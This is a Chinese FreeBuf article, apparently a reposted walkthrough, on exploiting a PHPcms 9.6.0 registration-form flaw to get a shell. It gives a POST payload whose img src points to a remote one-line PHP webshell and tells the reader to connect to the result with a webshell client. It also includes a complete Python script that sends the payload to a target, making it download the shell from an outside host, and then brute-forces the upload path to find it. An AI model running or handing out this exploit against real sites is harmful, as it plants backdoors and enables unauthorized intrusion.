对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下: 首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行)
我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话 poc如下:
- siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=>&dosubmit=1&protocol=
只需要修改img里面的链接为你本地写入的一句话即可,还有要注意的是在repeater里测试go时每一次都要修改username,password和email字段值(不能重复,汗) 我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话 连接菜刀,getshell 利用方式二:利用火狐的插件,操作如下
- # -*- coding:utf-8 -*-
- import requests
- import sys
- from datetime import datetime
- def getTime():
- year = str(datetime.now().year)
- month = "%02d" % datetime.now().month
- day = "%02d" % datetime.now().day
- hour = datetime.now().hour
- hour = hour - 12 if hour > 12 else hour
- hour = "%02d" % hour
- minute = "%02d" % datetime.now().minute
- second = "%02d" % datetime.now().second
- microsecond = "%06d" % datetime.now().microsecond
- microsecond = microsecond[:3]
- nowTime = year + month + day + hour + minute + second + microsecond
- return int(nowTime), year + "/" + month + day + "/"
- def main():
- if len(sys.argv) < 2:
- print("[*]Usage : Python 1.py http://xxx.com")
- sys.exit()
- host = sys.argv[1]
- url = host + "/index.php?m=member&c=index&a=register&siteid=1"
- data = {
- "siteid": "1",
- "modelid": "1",
- "username": "dsakkfaffdssdudi",
- "password": "123456",
- "email": "dsakkfddsjdi@qq.com",
- # 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0
- "info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>",
- "dosubmit": "1",
- "protocol": "",
- }
- try:
- startTime, _ = getTime()
- htmlContent = requests.post(url, data=data)
- finishTime, dateUrl = getTime()
- if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
- successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"
- print("[*]Shell : %s" % successUrl)
- else:
- print("[-]Notice : writing remoteShell successfully, but failing to get the echo. You can wait the program crawl the uploadfile(in 1-3 second),or re-run the program after modifying value of username and email.\n")
- successUrl = ""
- for t in range(startTime, finishTime):
- checkUrlHtml = requests.get(
- host + "/uploadfile/" + dateUrl + str(t) + ".php")
- if checkUrlHtml.status_code == 200:
- successUrl = host + "/uploadfile/" + \
- dateUrl + str(t) + ".php"
- print("[*]Shell : %s" % successUrl)
- break
- if successUrl == "":
- print(
- "[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")
- except:
- print("Request Error")
- if __name__ == '__main__':
- main()
*原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载 http://www.freebuf.com/vuls/131648.html?spm=5176.7752487.2.5.ktjJKf |